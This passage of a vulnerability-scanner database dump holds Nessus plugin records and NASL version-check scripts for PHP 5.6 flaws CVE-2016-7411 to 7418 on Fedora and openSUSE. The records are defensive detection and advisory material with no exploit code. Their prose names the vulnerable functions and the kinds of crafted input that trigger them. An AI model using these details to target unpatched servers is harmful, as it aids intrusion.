value:\"p-cpe:/a:fedoraproject:fedora:php\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:24\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/09/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/09/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/09/27\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^24([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 24\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC24\", reference:\"php-5.6.26-1.fc24\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:23:51", "description": "According to its banner, the version of PHP running on the remote web server is 5.6.x prior to 5.6.26. It is, therefore, affected by multiple vulnerabilities :\n\n - A flaw exists in ext/standard/var_unserializer.re when destroying deserialized objects due to improper validation of user-supplied input. An unauthenticated, remote attacker can exploit this, via a deserialize call that references a partially constructed object, to corrupt memory, resulting in a denial of service condition. (CVE-2016-7411)\n\n - An heap buffer overflow condition exists in the php_mysqlnd_rowp_read_text_protocol_aux() function within file ext/mysqlnd/mysqlnd_wireprotocol.c due to a failure to verify that a BIT field has the UNSIGNED_FLAG flag. An unauthenticated, remote attacker can exploit this, via specially crafted field metadata, to cause a denial of service condition. (CVE-2016-7412)\n\n - A use-after-free error exists in the wddx_stack_destroy() function within file ext/wddx/wddx.c when deserializing recordset elements. An unauthenticated, remote attacker can exploit this, via a specially crafted wddxPacket XML document, to cause a denial of service condition. (CVE-2016-7413)\n\n - An out-of-bounds access error exists in the phar_parse_zipfile() function within file ext/phar/zip.c due to a failure to ensure that the uncompressed_filesize field is large enough. An unauthenticated, remote attacker can exploit this, via a specially crafted archive, to cause a denial of service condition. (CVE-2016-7414)\n\n - A stack-based buffer overflow condition exists in the ICU4C library, specifically within file common/locid.cpp in the msgfmt_format_message() function, due to a failure to properly restrict the locale length provided to the Locale class. An unauthenticated, remote attacker can exploit this, via a long first argument to a MessageFormatter::formatMessage() function call, to cause a denial of service condition. (CVE-2016-7416)\n\n - A flaw exists in the spl_array_get_dimension_ptr_ptr() function within file ext/spl/spl_array.c due to a failure to properly validate the return value and data type when deserializing SplArray. An unauthenticated, remote attacker can exploit this, via specially crafted serialized data, to cause a denial of service condition. (CVE-2016-7417)\n\n - An out-of-bounds read error exists in the php_wddx_push_element() function within file ext/wddx/wddx.c when handling an incorrect boolean element, which leads to mishandling the wddx_deserialize() call. An unauthenticated, remote attacker can exploit this, via a specially crafted wddxPacket XML document, to cause a denial of service condition. (CVE-2016-7418)\n\n - An out-of-bounds access error exists in the phar_parse_tarfile() function within file ext/phar/tar.c when handling the verification of signatures. An unauthenticated, remote attacker can exploit this to cause an unspecified impact.\n\n - An integer overflow condition exists in the fgetcsv() function when handling CSV field lengths due to improper validation of certain input. An unauthenticated, remote attacker can exploit this to corrupt memory, resulting in a denial of service condition or the execution of arbitrary code.\n\n - An integer overflow condition exists in the wordwrap() function within file ext/standard/string.c due to improper validation of certain input. An unauthenticated, remote attacker can exploit this to corrupt memory, resulting in a denial of service condition or the execution of arbitrary code.\n\n - An integer overflow condition exists in the fgets() function within file ext/standard/file.c due to improper validation of certain input. An unauthenticated, remote attacker can exploit this to corrupt memory, resulting in a denial of service condition or the execution of arbitrary code.\n\n - An integer overflow condition exists in the xml_utf8_encode() function within file ext/xml/xml.c due to improper validation of certain input. An unauthenticated, remote attacker can exploit this to cause an unspecified impact.\n\n - A flaw exists in the exif_process_IFD_in_TIFF() function within file ext/exif/exif.c when handling uninitialized thumbnail data. An unauthenticated, remote attacker can exploit this to disclose memory contents.\n\nNote that the scanner has not attempted to exploit this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2019-01-09T00:00:00", "type": "nessus", "title": "PHP 5.6.x < 5.6.26 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-7411", "CVE-2016-7412", "CVE-2016-7413", "CVE-2016-7414", "CVE-2016-7416", "CVE-2016-7417", "CVE-2016-7418"], "modified": "2023-03-14T00:00:00", "cpe": ["cpe:2.3:a:php:php:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_98816", "href": "https://www.tenable.com/plugins/was/98816", "sourceData": "No source data", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:28:26", "description": "This update for php5 fixes the following security issues :\n\n - CVE-2016-7411: php5: Memory corruption when destructing deserialized object\n\n - CVE-2016-7412: Heap overflow in mysqlnd when not receiving UNSIGNED_FLAG in BIT field\n\n - CVE-2016-7413: Use after free in wddx_deserialize\n\n - CVE-2016-7414: Out of bounds heap read when verifying signature of zip phar in phar_parse_zipfile\n\n - CVE-2016-7416: Stack based buffer overflow in msgfmt_format_message\n\n - CVE-2016-7417: Missing type check when unserializing SplArray\n\n - CVE-2016-7418: NULL pointer dereference in php_wddx_push_element\n\nThis update was imported from the SUSE:SLE-12:Update update project.", "cvss3": {}, "published": "2016-10-17T00:00:00", "type": "nessus", "title": "openSUSE Security Update : php5 (openSUSE-2016-1193)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-7411", "CVE-2016-7412", "CVE-2016-7413", "CVE-2016-7414", "CVE-2016-7416", "CVE-2016-7417", "CVE-2016-7418"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:apache2-mod_php5", "p-cpe:/a:novell:opensuse:apache2-mod_php5-debuginfo", "p-cpe:/a:novell:opensuse:php5", "p-cpe:/a:novell:opensuse:php5-bcmath", "p-cpe:/a:novell:opensuse:php5-bcmath-debuginfo", "p-cpe:/a:novell:opensuse:php5-bz2", "p-cpe:/a:novell:opensuse:php5-bz2-debuginfo", "p-cpe:/a:novell:opensuse:php5-calendar", "p-cpe:/a:novell:opensuse:php5-calendar-debuginfo", "p-cpe:/a:novell:opensuse:php5-ctype", "p-cpe:/a:novell:opensuse:php5-ctype-debuginfo", "p-cpe:/a:novell:opensuse:php5-curl", "p-cpe:/a:novell:opensuse:php5-curl-debuginfo", "p-cpe:/a:novell:opensuse:php5-dba", "p-cpe:/a:novell:opensuse:php5-dba-debuginfo", "p-cpe:/a:novell:opensuse:php5-debuginfo", "p-cpe:/a:novell:opensuse:php5-debugsource", "p-cpe:/a:novell:opensuse:php5-devel", "p-cpe:/a:novell:opensuse:php5-dom", "p-cpe:/a:novell:opensuse:php5-dom-debuginfo", "p-cpe:/a:novell:opensuse:php5-enchant", "p-cpe:/a:novell:opensuse:php5-enchant-debuginfo", "p-cpe:/a:novell:opensuse:php5-exif", "p-cpe:/a:novell:opensuse:php5-exif-debuginfo", "p-cpe:/a:novell:opensuse:php5-fastcgi", "p-cpe:/a:novell:opensuse:php5-fastcgi-debuginfo", "p-cpe:/a:novell:opensuse:php5-fileinfo", "p-cpe:/a:novell:opensuse:php5-fileinfo-debuginfo", "p-cpe:/a:novell:opensuse:php5-firebird", "p-cpe:/a:novell:opensuse:php5-firebird-debuginfo", "p-cpe:/a:novell:opensuse:php5-fpm", "p-cpe:/a:novell:opensuse:php5-fpm-debuginfo", "p-cpe:/a:novell:opensuse:php5-ftp", "p-cpe:/a:novell:opensuse:php5-ftp-debuginfo", "p-cpe:/a:novell:opensuse:php5-gd", "p-cpe:/a:novell:opensuse:php5-gd-debuginfo", "p-cpe:/a:novell:opensuse:php5-gettext", "p-cpe:/a:novell:opensuse:php5-gettext-debuginfo", "p-cpe:/a:novell:opensuse:php5-gmp", "p-cpe:/a:novell:opensuse:php5-gmp-debuginfo", "p-cpe:/a:novell:opensuse:php5-iconv", "p-cpe:/a:novell:opensuse:php5-iconv-debuginfo", "p-cpe:/a:novell:opensuse:php5-imap", "p-cpe:/a:novell:opensuse:php5-imap-debuginfo", "p-cpe:/a:novell:opensuse:php5-intl", "p-cpe:/a:novell:opensuse:php5-intl-debuginfo", "p-cpe:/a:novell:opensuse:php5-json", "p-cpe:/a:novell:opensuse:php5-json-debuginfo", "p-cpe:/a:novell:opensuse:php5-ldap", "p-cpe:/a:novell:opensuse:php5-ldap-debuginfo", "p-cpe:/a:novell:opensuse:php5-mbstring", "p-cpe:/a:novell:opensuse:php5-mbstring-debuginfo", "p-cpe:/a:novell:opensuse:php5-mcrypt", "p-cpe:/a:novell:opensuse:php5-mcrypt-debuginfo", "p-cpe:/a:novell:opensuse:php5-mssql", "p-cpe:/a:novell:opensuse:php5-mssql-debuginfo", "p-cpe:/a:novell:opensuse:php5-mysql", "p-cpe:/a:novell:opensuse:php5-mysql-debuginfo", "p-cpe:/a:novell:opensuse:php5-odbc", "p-cpe:/a:novell:opensuse:php5-odbc-debuginfo", "p-cpe:/a:novell:opensuse:php5-opcache", "p-cpe:/a:novell:opensuse:php5-opcache-debuginfo", "p-cpe:/a:novell:opensuse:php5-openssl", "p-cpe:/a:novell:opensuse:php5-openssl-debuginfo", "p-cpe:/a:novell:opensuse:php5-pcntl", "p-cpe:/a:novell:opensuse:php5-pcntl-debuginfo", "p-cpe:/a:novell:opensuse:php5-pdo", "p-cpe:/a:novell:opensuse:php5-pdo-debuginfo", "p-cpe:/a:novell:opensuse:php5-pear", "p-cpe:/a:novell:opensuse:php5-pgsql", "p-cpe:/a:novell:opensuse:php5-pgsql-debuginfo", "p-cpe:/a:novell:opensuse:php5-phar", "p-cpe:/a:novell:opensuse:php5-phar-debuginfo", "p-cpe:/a:novell:opensuse:php5-posix", "p-cpe:/a:novell:opensuse:php5-posix-debuginfo", "p-cpe:/a:novell:opensuse:php5-pspell", "p-cpe:/a:novell:opensuse:php5-pspell-debuginfo", "p-cpe:/a:novell:opensuse:php5-readline", "p-cpe:/a:novell:opensuse:php5-readline-debuginfo", "p-cpe:/a:novell:opensuse:php5-shmop", "p-cpe:/a:novell:opensuse:php5-shmop-debuginfo", "p-cpe:/a:novell:opensuse:php5-snmp", "p-cpe:/a:novell:opensuse:php5-snmp-debuginfo", "p-cpe:/a:novell:opensuse:php5-soap", "p-cpe:/a:novell:opensuse:php5-soap-debuginfo", "p-cpe:/a:novell:opensuse:php5-sockets", "p-cpe:/a:novell:opensuse:php5-sockets-debuginfo", "p-cpe:/a:novell:opensuse:php5-sqlite", "p-cpe:/a:novell:opensuse:php5-sqlite-debuginfo", "p-cpe:/a:novell:opensuse:php5-suhosin", "p-cpe:/a:novell:opensuse:php5-suhosin-debuginfo", "p-cpe:/a:novell:opensuse:php5-sysvmsg", "p-cpe:/a:novell:opensuse:php5-sysvmsg-debuginfo", "p-cpe:/a:novell:opensuse:php5-sysvsem", "p-cpe:/a:novell:opensuse:php5-sysvsem-debuginfo", "p-cpe:/a:novell:opensuse:php5-sysvshm", "p-cpe:/a:novell:opensuse:php5-sysvshm-debuginfo", "p-cpe:/a:novell:opensuse:php5-tidy", "p-cpe:/a:novell:opensuse:php5-tidy-debuginfo", "p-cpe:/a:novell:opensuse:php5-tokenizer", "p-cpe:/a:novell:opensuse:php5-tokenizer-debuginfo", "p-cpe:/a:novell:opensuse:php5-wddx", "p-cpe:/a:novell:opensuse:php5-wddx-debuginfo", "p-cpe:/a:novell:opensuse:php5-xmlreader", "p-cpe:/a:novell:opensuse:php5-xmlreader-debuginfo", "p-cpe:/a:novell:opensuse:php5-xmlrpc", "p-cpe:/a:novell:opensuse:php5-xmlrpc-debuginfo", "p-cpe:/a:novell:opensuse:php5-xmlwriter", "p-cpe:/a:novell:opensuse:php5-xmlwriter-debuginfo", "p-cpe:/a:novell:opensuse:php5-xsl", "p-cpe:/a:novell:opensuse:php5-xsl-debuginfo", "p-cpe:/a:novell:opensuse:php5-zip", "p-cpe:/a:novell:opensuse:php5-zip-debuginfo", "p-cpe:/a:novell:opensuse:php5-zlib", "p-cpe:/a:novell:opensuse:php5-zlib-debuginfo", "cpe:/o:novell:opensuse:42.1"], "id": "OPENSUSE-2016-1193.NASL", "href": "https://www.tenable.com/plugins/nessus/94089", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2016-1193.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94089);\n script_version(\"2.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2016-7411\", \"CVE-2016-7412\", \"CVE-2016-7413\", \"CVE-2016-7414\", \"CVE-2016-7416\", \"CVE-2016-7417\", \"CVE-2016-7418\");\n\n script_name(english:\"openSUSE Security Update : php5 (openSUSE-2016-1193)\");\n script_summary(english:\"Check for the openSUSE-2016-1193 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for php5 fixes the following security issues :\n\n - CVE-2016-7411: php5: Memory corruption when destructing\n deserialized object\n\n - CVE-2016-7412: Heap overflow in mysqlnd when not\n receiving UNSIGNED_FLAG in BIT field\n\n - CVE-2016-7413: Use after free in wddx_deserialize\n\n - CVE-2016-7414: Out of bounds heap read when verifying\n signature of zip phar in phar_parse_zipfile\n\n - CVE-2016-7416: Stack based buffer overflow in\n msgfmt_format_message\n\n - CVE-2016-7417: Missing type check when unserializing\n SplArray\n\n - CVE-2016-7418: NULL pointer dereference in\n php_wddx_push_element\n\nThis update was imported from the SUSE:SLE-12:Update update project.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=999679\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=999680\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=999682\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=999684\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=999685\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=999819\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=999820\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected php5 packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-mod_php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-mod_php5-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-bcmath-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-bz2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-bz2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-calendar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-calendar-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ctype\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ctype-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-curl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-dba-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-dom\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-dom-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-enchant\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-enchant-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-exif\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-exif-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-fastcgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-fastcgi-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-fileinfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-fileinfo-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-firebird\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-firebird-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-fpm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-fpm-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ftp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ftp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gettext\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gettext-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gmp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-iconv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-iconv-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-imap-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-intl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-intl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-json\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-json-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ldap-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mbstring-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mcrypt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mcrypt-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mssql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mssql-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mysql-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-odbc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-opcache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-opcache-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-openssl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pcntl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pcntl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pdo-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pgsql-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-phar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-phar-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-posix\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-posix-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pspell-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-readline\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-readline-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-shmop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-shmop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-snmp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-soap-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sockets\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sockets-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sqlite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sqlite-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-suhosin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-suhosin-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvmsg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvmsg-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvsem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvsem-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvshm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvshm-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-tidy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-tidy-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-tokenizer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-tokenizer-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-wddx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-wddx-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlreader\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlreader-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlrpc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlwriter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlwriter-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xsl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xsl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-zip\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-zip-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-zlib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-zlib-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/10/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release 